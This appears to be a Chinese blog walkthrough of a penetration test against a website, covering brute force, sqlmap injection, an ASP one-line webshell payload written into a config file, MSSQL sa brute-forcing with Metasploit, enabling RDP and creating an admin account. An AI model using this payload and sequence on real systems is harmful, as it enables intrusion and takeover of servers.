一次完整的渗透测试
目标网站:39.xxx.xxx.xxx
一阶段前台测试:
1、前台存在登陆入口且无验证码(肯定要暴力破解啊)
2、前台url参数处加敏感字符数据库报错存在sql注入
3、前台登陆处输入危险字符,数据库报错存在post注入
测试结果如下:
暴力破解获得
用户名:admin
密码:123456
利用sqlmap跑注入并没有跑出任何数据
只能登陆看一下了
二、登陆前台测试
利用前台的会员登陆发现有使用第三方编辑器(并没有找到可利用漏洞)
存在xss漏洞
存在sql注入漏洞
在登陆的状态下继续进行sql注入(burp copyto file )发现跑出来一个表
只跑出了当前账户和一个同级账户
到这里看了眼后台还是一脸懵逼
三、黑盒已经不好搞了,下载同类CMS
搭建环境撸一把
把相同源码cms数据库表名
将对应表明加入sqlmap库中
路径:sqlmap/txt/common-tables.txt
(表名一定要放前边放最后要跑一年的)
继续sqlmap跑、
成功进入后台
四、getshell
进入后台之后发现编辑器两个
文件上传白名单,试了很久,基本行不通了
后台依旧存在XSS漏洞(这里的XSS可以利用拿到后台管理员cookie)
搞了半天发现又遇到瓶颈了
再去撸一把源码
发现当更新缓存的时候,根目录下多了一个HTML文件修改html文件后发现报错
在后台参数配置处修改配置发现报错
审查代码发现代码漏洞
anxi
nMall.basic.asp是一个ASP文件考虑写入一句话
本地构造payload(这里随便改点东西网站就瘫了如果在目标网站那肯定凉凉了)
"%> <%eval request ("pass")%> <%'
这里原有的邮箱 只能闭合 不能删掉,不然数据库会错误
菜刀连接、
五、提权、
nmap扫描发现目标开放1433端口
msf对1433端口sa进行爆破
爆破成功
mssql账号和密码为:sa /123456
使用msf命令执行模块,执行最终的dos命令
use auxiliary/admin/mssql/mssql_exec
开启3389端口并且建立管理用户以后
利用HTTP隧道进行连接3389(绕过防火墙)
详细方法见下面的网址
https://www.cnblogs.com/xiaoyunxiaogang/p/10939485.html
另外可以
通过MSFVenom生成exe后门木马拿shell()
-------------------------------------------
个性签名:独学而无友,则孤陋而寡闻。做一个灵魂有趣的人!知识源于分享!
如果觉得这篇文章对你有小小的帮助的话,记得在右下角点个“推荐”哦,博主在此感谢!